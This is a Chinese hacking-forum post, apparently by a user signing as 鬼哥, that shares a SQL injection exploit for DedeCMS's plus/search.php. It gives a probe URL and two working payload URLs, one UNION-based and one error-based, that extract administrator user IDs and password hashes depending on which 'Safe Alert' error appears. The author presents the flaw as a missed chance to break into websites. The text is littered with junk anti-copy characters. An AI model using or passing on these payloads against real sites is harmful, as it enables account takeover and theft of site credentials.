转载不加作者名的没JJ
D8 z) x& |" X9 }" [5 H: m5 P" k$ u0 n1 h$ I% V$ v/ {
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
1 ]- g( L- |* z- e- G; ^
9 _9 r p7 e0 a7 L G" @+ S* D$ D. F既然已经发出来了,我就把我自己搞的exp发下吧。。唉。& a# M2 z: ~& |
) K) V) b$ u3 m+ l$ \7 k我一般是这样测试的:# T, x- @7 N! |7 j. [/ m" x
' V8 X) H( p: ]5 o提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a! |9 `2 v/ V! \9 u$ [
* ?" _/ L0 a3 U1 {; H# M$ M
转载不加作者名的没JJ1 g. Z8 K9 X' k# l$ M/ G
- C; R2 V2 n. N
作者:鬼哥5 b7 _7 V- P# h6 N
) N/ K+ b8 y+ d* l% M6 D2 U l, c - D: c+ @; {, z V/ N8 Q, o6 P8 ?
; [2 _% W1 |" E1 d4 A
看结果如果提示 p3 w; A" E& k0 ~& l9 p9 o
: E' c' [ G3 z4 l! `# h
Safe Alert: Request Error step 2 !( M! c a2 Q0 L* }
+ z4 l2 q4 V+ ^6 H8 W' y那么直接用下面的exp5 s' y5 J: x0 O
' N( F9 b8 H( H' S! j$ t$ Z: ~xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a3 _$ m# Z% h( I2 j+ o1 `
$ J" p! r- W3 K
. Y$ q0 n- A- m7 Q
看结果如果提示/ ~) r7 C+ ~" u- a
2 w0 X& q, p: B3 ~
Safe Alert: Request Error step 1 !8 z a* _: z9 Q/ \! p
5 v, l& b& M& w+ c$ C. s0 H+ H那么直接用下面的exp
0 ]8 {2 n, ?' h; n" r+ N0 b% P# v# e* j3 b
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a) {: {/ G$ P4 v4 I! [
( `# `" F: h$ `3 ]7 S" g F: I, c) N* a1 t4 j, L
如果正常显示证明漏洞不存在了。( a2 h2 x8 X8 ^6 W6 \, B/ Y
5 B/ B# U# M8 \. k' j转载不加作者名的没JJ |